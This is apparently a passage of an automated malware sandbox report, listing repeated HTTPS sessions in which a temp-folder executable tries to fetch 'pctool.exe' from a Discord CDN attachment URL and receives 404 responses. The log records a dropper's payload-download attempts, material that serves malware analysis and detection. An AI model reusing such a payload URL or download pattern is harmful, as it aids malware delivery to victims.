                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B5zS7bLFu2w%2F3FjwhMtksCi95i9UdTj10Kpdjk4T4TpLyI9x%2BIlDta1f07Mq%2ByIfaV3YzANid1AtSyqIP9XP%2BSeouYUMnr36XVJYY7%2BmnLiLxvNhid7QrGNlAdrMZFbJopflaA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Set-Cookie: _cfuvid=g9cXa5aXWK95l.pZHUJh2luNMN6BxuFKyqIoO4XsDN0-1724230653839-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                      Server: cloudflare
                                      CF-RAY: 8b696a925f6c4211-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-08-21 08:57:33 UTC | 36 | IN | Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                                      Data Ascii: This content is no longer available.


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      8 | 192.168.2.4 | 59972 | 162.159.130.233 | 443 | 7972 | C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-08-21 08:57:39 UTC | 104 | OUT | GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1
                                      Host: cdn.discordapp.com
                                      2024-08-21 08:57:39 UTC | 1051 | IN | HTTP/1.1 404 Not Found
                                      Date: Wed, 21 Aug 2024 08:57:39 GMT
                                      Content-Type: text/plain;charset=UTF-8
                                      Content-Length: 36
                                      Connection: close
                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                      Set-Cookie: __cf_bm=eTOcN338iJPkKWDX6.nqa3zwWV0DsGurA5C3Yed6Zbs-1724230659-1.0.1.1-HSbqEhkiw1hJfJNcwXZieyCfMT0PwXC8nw1p.Aws4Yo0k3htruQKM9ZgN.sCUh0SCFELZd_GgIrqHkjST_HJqg; path=/; expires=Wed, 21-Aug-24 09:27:39 GMT; domain=.discordapp.com; HttpOnly; Secure
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TVmRX5scst0fCvz0F%2Fk4JYIFD3K5UoJaUDUaKjxec53vGYufIR%2BX0HukOGHMZRijQmppVMZFtuJJoaBlm0pnLScyew09CYruop9DSYVwU5Gz%2F%2BgKyP0ycgAY3Wil9efdk%2BSdjw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Set-Cookie: _cfuvid=EXI_dRZVnDascO6a90jw3WVKoDmPE5WUxcaB86l5mtQ-1724230659453-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                      Server: cloudflare
                                      CF-RAY: 8b696ab58ccd41d3-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-08-21 08:57:39 UTC | 36 | IN | Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                                      Data Ascii: This content is no longer available.


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      9 | 192.168.2.4 | 59975 | 162.159.130.233 | 443 | 7972 | C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-08-21 08:57:44 UTC | 104 | OUT | GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1
                                      Host: cdn.discordapp.com
                                      2024-08-21 08:57:45 UTC | 1053 | IN | HTTP/1.1 404 Not Found
                                      Date: Wed, 21 Aug 2024 08:57:45 GMT
                                      Content-Type: text/plain;charset=UTF-8
                                      Content-Length: 36
                                      Connection: close
                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                      Set-Cookie: __cf_bm=8CVcyNZfC9nOorg38LU1pIJKYi5MqrmMXhCIT.F3fg8-1724230665-1.0.1.1-HXsEZewA7LjPb8P483nbiINrFDOR2v56uHdlA0kyEgBUUXyxo8SjvdLwPlO0dXl1alUmvt2q6lTKMb8XS.vg6g; path=/; expires=Wed, 21-Aug-24 09:27:45 GMT; domain=.discordapp.com; HttpOnly; Secure
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iGSIgPvvOdZ2T5qPQiexELLUhfyXkNGS619xCBK%2FmbWeb7Z90KTrPL8tu%2BUzlvq%2Bv4ZTlsf2zd4eTPAimkWG8bXAQ%2FwMrUDUclYy%2BO8Xb0RAjE3O6dE5uJAkKP%2Fp20AYQBPLhA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Set-Cookie: _cfuvid=FyAm59iaq4RnfE_eCoL4GeouO89J4T.7q_QY667W6BE-1724230665079-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                      Server: cloudflare
                                      CF-RAY: 8b696ad8a92d7c96-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-08-21 08:57:45 UTC | 36 | IN | Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                                      Data Ascii: This content is no longer available.


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      10 | 192.168.2.4 | 59978 | 162.159.130.233 | 443 | 7972 | C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-08-21 08:57:50 UTC | 104 | OUT | GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1
                                      Host: cdn.discordapp.com
                                      2024-08-21 08:57:50 UTC | 1049 | IN | HTTP/1.1 404 Not Found
                                      Date: Wed, 21 Aug 2024 08:57:50 GMT
                                      Content-Type: text/plain;charset=UTF-8
                                      Content-Length: 36
                                      Connection: close
                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                      Set-Cookie: __cf_bm=qU8rfA7XdmwSG5ysqqfRhYa0c5m0eTknlyPuY_X2Zc4-1724230670-1.0.1.1-aifQIHyl1IKHGCBxL30n0hpAvqvV2qItjnuTsTJRkyiHf14__klbUNOXwSphO8IAzAGrZMiBlNThUx99s5WHTw; path=/; expires=Wed, 21-Aug-24 09:27:50 GMT; domain=.discordapp.com; HttpOnly; Secure
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0tqlj64OpuItPLuokibqTvasX99m19tzptAxCizZM1%2FsLfopaUum0CMiQU6%2FHtFqxbVCmC3RXu%2FeKb%2FOKVXT3hWp149CVzS9qoEAhui7MJb9Gajl6gmNrmzSCuxt4U6GV6bZZQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Set-Cookie: _cfuvid=Ia86BkihzpSWVNbCkYJjIxbAuDBLdLrrD9.E_HB4N8Q-1724230670843-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                      Server: cloudflare
                                      CF-RAY: 8b696afcb9227ca5-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-08-21 08:57:50 UTC | 36 | IN | Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                                      Data Ascii: This content is no longer available.


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      11 | 192.168.2.4 | 59983 | 162.159.130.233 | 443 | 7972 | C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-08-21 08:57:56 UTC | 104 | OUT | GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1
                                      Host: cdn.discordapp.com
                                      2024-08-21 08:57:56 UTC | 1049 | IN | HTTP/1.1 404 Not Found
                                      Date: Wed, 21 Aug 2024 08:57:56 GMT
                                      Content-Type: text/plain;charset=UTF-8
                                      Content-Length: 36
                                      Connection: close
                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                      Set-Cookie: __cf_bm=6zuegI48FEcVXZfst96HdNFv3TSFNVQwFsPOqjTjm6g-1724230676-1.0.1.1-hGy1ywwrTckLgTjC26D6_F.xZwY0uh5hzm0UkHi9PHKJVTLj0Gvku2r29PHELhoJzbsqaKi0bf6H0gorhGoZqQ; path=/; expires=Wed, 21-Aug-24 09:27:56 GMT; domain=.discordapp.com; HttpOnly; Secure
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PPoepVex4tK3GckkvYZLrn%2BXW4aB5tlxtZejxSeqd34%2FiHTfeIKl%2BpJZghmXz5xTae0gLtpJluBOK3OD6emk6GtaSht3QU6C6pLKvjSEG%2BZQetWa4IEomiUhs0G9HedxENq0qQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Set-Cookie: _cfuvid=cGD49sxET8z.WKWEjwxrS_ZECHJh9v4zpLMJHiP7KNI-1724230676489-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                      Server: cloudflare
                                      CF-RAY: 8b696b1ff87e4319-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-08-21 08:57:56 UTC | 36 | IN | Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                                      Data Ascii: This content is no longer available.


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      12 | 192.168.2.4 | 59988 | 162.159.130.233 | 443 | 7972 | C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-08-21 08:58:02 UTC | 104 | OUT | GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1
                                      Host: cdn.discordapp.com
                                      2024-08-21 08:58:02 UTC | 1045 | IN | HTTP/1.1 404 Not Found
                                      Date: Wed, 21 Aug 2024 08:58:02 GMT
                                      Content-Type: text/plain;charset=UTF-8
                                      Content-Length: 36
                                      Connection: close
                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                      Set-Cookie: __cf_bm=knesx7DSN5Jf9.f8nrcNe45dUvIee84DYFvSB0waUbA-1724230682-1.0.1.1-afhx6ocTWqnt.ionZY.wK7ha6AEq1GVZNUs8Sn_DQbRN2jlNCxgMhpoRRTmGIT7JtqYHjBy4YGz4p2bRFDXEMQ; path=/; expires=Wed, 21-Aug-24 09:28:02 GMT; domain=.discordapp.com; HttpOnly; Secure
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FwMRErWBlHWTAXo6O8ONlrp6c1aYnMBbX6zSKFG4zWd2kpeqLzP4nb8SQVR%2FHOMITvFWtTKZsonxHnZjPAGrxU9JuG2xHVsMlZXsjEmdPokHfY10i3QbyuIpAOnsokjLBa7cZA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Set-Cookie: _cfuvid=BTdj7aneGMzxlvEWKOh886C10hnjhxHmPMOc6dOKEKI-1724230682127-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                      Server: cloudflare
                                      CF-RAY: 8b696b4338974204-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-08-21 08:58:02 UTC | 36 | IN | Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                                      Data Ascii: This content is no longer available.


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      13 | 192.168.2.4 | 59991 | 162.159.130.233 | 443 | 7972 | C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-08-21 08:58:07 UTC | 104 | OUT | GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1
                                      Host: cdn.discordapp.com
                                      2024-08-21 08:58:07 UTC | 1055 | IN | HTTP/1.1 404 Not Found
                                      Date: Wed, 21 Aug 2024 08:58:07 GMT
                                      Content-Type: text/plain;charset=UTF-8
                                      Content-Length: 36
                                      Connection: close
                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                      Set-Cookie: __cf_bm=QBfgPowNSyHKBwR4f7j3OJQn_APs9Y.XzKYVaxMZMMc-1724230687-1.0.1.1-piFiTuSgFWnFvr615lIClE_pu43vyZ4PZ5ZZpULNdkvbL.N1DFWU6OBp4Z9bMUvY4hOZcLSSQPj0mlVW8P2s3A; path=/; expires=Wed, 21-Aug-24 09:28:07 GMT; domain=.discordapp.com; HttpOnly; Secure
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HqHycy%2BgnWyAz6cOaaQCtMgB4h%2BuT3rt4wvexZiL%2Brg9Lv3fWb0Ylp0wyU3M7CBcx5TzHRlseblMYHP9FYF5p2TW%2F%2BgTAHz4pC5aYVSJHGAl0aKteFSp%2B69L%2FTUV6pQUZYMN4Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Set-Cookie: _cfuvid=X33qFnUkNQW1Ewxnpo4ZVIZo8wKEB7yMr056MhSjbCE-1724230687749-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                      Server: cloudflare
                                      CF-RAY: 8b696b665922428f-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-08-21 08:58:07 UTC | 36 | IN | Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                                      Data Ascii: This content is no longer available.


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      14 | 192.168.2.4 | 59994 | 162.159.130.233 | 443 | 7972 | C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-08-21 08:58:13 UTC | 104 | OUT | GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1
                                      Host: cdn.discordapp.com
                                      2024-08-21 08:58:13 UTC | 1051 | IN | HTTP/1.1 404 Not Found
                                      Date: Wed, 21 Aug 2024 08:58:13 GMT
                                      Content-Type: text/plain;charset=UTF-8
                                      Content-Length: 36
                                      Connection: close
                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                      Set-Cookie: __cf_bm=bskmNyFA.em5pucrqCIeIAZxchsxcrAWFg7iixkJhvA-1724230693-1.0.1.1-47TjB8Yk9s.11hO6ZntteaTo8FbnA9qjd91b2I_Dr5q0RZaWWW5K3IUD5FyoZXX4QIN3AEIaSqWIk57yWm0NwA; path=/; expires=Wed, 21-Aug-24 09:28:13 GMT; domain=.discordapp.com; HttpOnly; Secure
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yjMAwkdG0jbfdYcVfaeNwH9J3rviF3UGMvuZpmLWrAUdY4DIRoaLwQgOp%2Bmon%2BIrX7BTdB%2FsXko3ijz67fK7EudLWpuGfiV%2FLo5lWOaR5ia%2BXrYpUCRtJl3lDFxPbPPjC9zV7Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Set-Cookie: _cfuvid=L47pnd5qDKv8ufhpS4KEHViVs6Z4b0fUpsJ4_MrWGco-1724230693394-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                      Server: cloudflare
                                      CF-RAY: 8b696b899b0f7ca6-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-08-21 08:58:13 UTC | 36 | IN | Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                                      Data Ascii: This content is no longer available.


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      15 | 192.168.2.4 | 59998 | 162.159.130.233 | 443 | 7972 | C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-08-21 08:58:18 UTC | 128 | OUT | GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1
                                      Host: cdn.discordapp.com
                                      Connection: Keep-Alive
                                      2024-08-21 08:58:19 UTC | 1049 | IN | HTTP/1.1 404 Not Found
                                      Date: Wed, 21 Aug 2024 08:58:19 GMT
                                      Content-Type: text/plain;charset=UTF-8
                                      Content-Length: 36
                                      Connection: close
                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                      Set-Cookie: __cf_bm=xX3H1OGqwmcWYigOX2Y0PXpWbveQUJPOzdgLKH1otTc-1724230699-1.0.1.1-XgtMHmm5jtkcBxJXYcob_OBN.7dzkLGmK6UG1ZnRM9pIuwE7ylMt1bozok8pWoThanDZGOxH8XwwKUsuzbr48A; path=/; expires=Wed, 21-Aug-24 09:28:19 GMT; domain=.discordapp.com; HttpOnly; Secure
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vvlzd%2FnGLUcWrWE%2FsSLglO3kPKD4ADwOlxWdyNkM46L5l5uqpzu1JFX%2BgifvU847wWuWCGkBEq5leczmnL5b%2BPdwBOzOOCoxTlGdsDXqUs7WShRf65xy5xnPUVMTYa3OIS9WPg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Set-Cookie: _cfuvid=MrWa4TPd6T5gDzXo7vdMSZrVbSssLLC_hrH8VND8Yec-1724230699076-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                      Server: cloudflare
                                      CF-RAY: 8b696bad28fb8c63-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-08-21 08:58:19 UTC | 36 | IN | Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                                      Data Ascii: This content is no longer available.


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      16 | 192.168.2.4 | 60000 | 162.159.130.233 | 443 | 7972 | C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-08-21 08:58:24 UTC | 104 | OUT | GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1
                                      Host: cdn.discordapp.com
                                      2024-08-21 08:58:24 UTC | 1049 | IN | HTTP/1.1 404 Not Found
                                      Date: Wed, 21 Aug 2024 08:58:24 GMT
                                      Content-Type: text/plain;charset=UTF-8
                                      Content-Length: 36
                                      Connection: close
                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                      Set-Cookie: __cf_bm=QCPexjQNCs2wcHfkMc3UB.KIL7v29VmCdADSrpsw1c4-1724230704-1.0.1.1-u2LWwTgBDJGOd27KhzdqLBonf2yhVTEUiQXtrOCU3IcGpiahiwFE8HhBaGhXGr6E5Qf9r4Gn1Acm0gh0Dnk7mA; path=/; expires=Wed, 21-Aug-24 09:28:24 GMT; domain=.discordapp.com; HttpOnly; Secure
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IQNvSm18ZHkfgQFbwFxRSIONDoOx5MvXtAz1G0j1qz3qpOgum9JorpGJSkCp8QMPovbaueFNTQ2p4i9k%2FocaVfhR73QBpNDNjyJc4JM038vpmjbfTfjK%2BLlweau%2FSn8RV%2FRCvg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Set-Cookie: _cfuvid=pNhmg.qUGiJXIK7Ia9wLlTbaFN.0BHeOkU_CnIP8v6o-1724230704735-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                      Server: cloudflare
                                      CF-RAY: 8b696bd08a5e72b3-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-08-21 08:58:24 UTC | 36 | IN | Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                                      Data Ascii: This content is no longer available.


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      17 | 192.168.2.4 | 60004 | 162.159.130.233 | 443 | 7972 | C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-08-21 08:58:30 UTC | 104 | OUT | GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1
                                      Host: cdn.discordapp.com
                                      2024-08-21 08:58:30 UTC | 1045 | IN | HTTP/1.1 404 Not Found
                                      Date: Wed, 21 Aug 2024 08:58:30 GMT
                                      Content-Type: text/plain;charset=UTF-8
                                      Content-Length: 36
                                      Connection: close
                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                      Set-Cookie: __cf_bm=krurwKpbTymLVgA2aApYf0ltPpSMv8HcfCC86x2Xq7s-1724230710-1.0.1.1-MNrwiCoqVqUtpkKjh4noYP0rXrluX.KsR4hgHgRFjksQCVgwhK7qiAPz2EPBejbfS_ENn.0I5daTBoW0ZoqGSg; path=/; expires=Wed, 21-Aug-24 09:28:30 GMT; domain=.discordapp.com; HttpOnly; Secure
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c32HFYxZxHf0DFmno9id5UAIZLgZ7NmIGHdyPkv7uhTdPFo%2FgCjYf0ZbOfAJADKCoFlZeTed9WsmR3vjZ%2FSuAXIB6gg3EMdn9qj6WbtyiSeQb0jkNmqoJsCGHePr59ldtLnyKg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Set-Cookie: _cfuvid=OCZA2quprmYGr.uAq_C0UfTwTpojAbtUaQOiPENfxYE-1724230710547-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                      Server: cloudflare
                                      CF-RAY: 8b696bf4df28c330-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-08-21 08:58:30 UTC | 36 | IN | Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                                      Data Ascii: This content is no longer available.


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      18 | 192.168.2.4 | 60008 | 162.159.130.233 | 443 | 7972 | C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-08-21 08:58:36 UTC | 128 | OUT | GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1
                                      Host: cdn.discordapp.com
                                      Connection: Keep-Alive
                                      2024-08-21 08:58:37 UTC | 1051 | IN | HTTP/1.1 404 Not Found
                                      Date: Wed, 21 Aug 2024 08:58:37 GMT
                                      Content-Type: text/plain;charset=UTF-8
                                      Content-Length: 36
                                      Connection: close
                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                      Set-Cookie: __cf_bm=8Cd9jYQ1izsurwmEqPFW3aHF00qy.Vl8W4xd3znwmzg-1724230717-1.0.1.1-Cg_LqgaHwqiHRxVbnFucaKxTTAk.5DElwYM75pzc4aUFc0zFUUj5vN7e7seSzFjszRhkJPNRYrA3BGzjY_73Lg; path=/; expires=Wed, 21-Aug-24 09:28:37 GMT; domain=.discordapp.com; HttpOnly; Secure
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AN40IHTdZpy5FvY1ZBEtX1LHGiwQx5m64vk4%2Ba7KD%2BUuQaKm%2FkE2CBdAcWZH%2B42UyAd3wxXsZXYLI0KOlOaBxu6uubcPrHEwoG4kvoAKNBum%2BbnkJrFQcu5XC0zU8eTOluvPsg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Set-Cookie: _cfuvid=Vnv13vlL.9RSrGj1vXXKJoadQxpJWoA6EJKZJyNo2xY-1724230717062-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                      Server: cloudflare
                                      CF-RAY: 8b696c1d98e00f59-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-08-21 08:58:37 UTC | 36 | IN | Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                                      Data Ascii: This content is no longer available.


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      19 | 192.168.2.4 | 60012 | 162.159.130.233 | 443 | 7972 | C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-08-21 08:58:42 UTC | 128 | OUT | GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1
                                      Host: cdn.discordapp.com
                                      Connection: Keep-Alive
                                      2024-08-21 08:58:42 UTC | 1049 | IN | HTTP/1.1 404 Not Found
                                      Date: Wed, 21 Aug 2024 08:58:42 GMT
                                      Content-Type: text/plain;charset=UTF-8
                                      Content-Length: 36
                                      Connection: close
                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                      Set-Cookie: __cf_bm=ZsescNtNQBJnq2y9c_4Fxz0TN2thXuVgGbIveMtnkM8-1724230722-1.0.1.1-ArLH5zt6K0KiWkFgbOYyjfZywBZeYzVhggeOJCNwNl.SR63AR5KdQnortVoGzx6A8O7t9xUtb7o_PPS5jEzgzg; path=/; expires=Wed, 21-Aug-24 09:28:42 GMT; domain=.discordapp.com; HttpOnly; Secure
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8fOtJHQr%2BDq01%2FmWcHGEbFDJeQT72oXle5VcOwyecLh7yRLbX7SAdFK8628PKRUrYIyHo13ukFd9kgZgp4Bi6YQaAwu6NiAc9e%2BFEqMI0ykSGJpB0QMudHpgaGAbkIjx%2BKjkwQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Set-Cookie: _cfuvid=yJ63nIIWAxjeSHzhuFsssk4DZoTpKx1ERgmCXNRsJ1Q-1724230722681-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                      Server: cloudflare
                                      CF-RAY: 8b696c40bf06183d-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-08-21 08:58:42 UTC | 36 | IN | Data Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                                      Data Ascii: This content is no longer available.


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      20 | 192.168.2.4 | 60017 | 162.159.130.233 | 443 | 7972 | C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-08-21 08:58:48 UTC | 128 | OUT | GET /attachments/873244194234318850/897174379568451604/pctool.exe HTTP/1.1
                                      Host: cdn.discordapp.com
                                      Connection: Keep-Alive
                                      2024-08-21 08:58:48 UTC | 1051 | IN | HTTP/1.1 404 Not Found
                                      Date: Wed, 21 Aug 2024 08:58:48 GMT
                                      Content-Type: text/plain;charset=UTF-8
                                      Content-Length: 36
                                      Connection: close
                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                      Set-Cookie: __cf_bm=4KNDY5YA.7ZVHZEg0lB64S65agZ.ULCcntjwbaxnH0Q-1724230728-1.0.1.1-w1Q4EcpdnxTHG84EfHv.gpl7BgPuOICKNlUFSPySoQOyPw4zLFl9IvIrGTcwa3mJcFIR40nBOWD5qPX6WMIpgQ; path=/; expires=Wed, 21-Aug-24 09:28:48 GMT; domain=.discordapp.com; HttpOnly; Secure
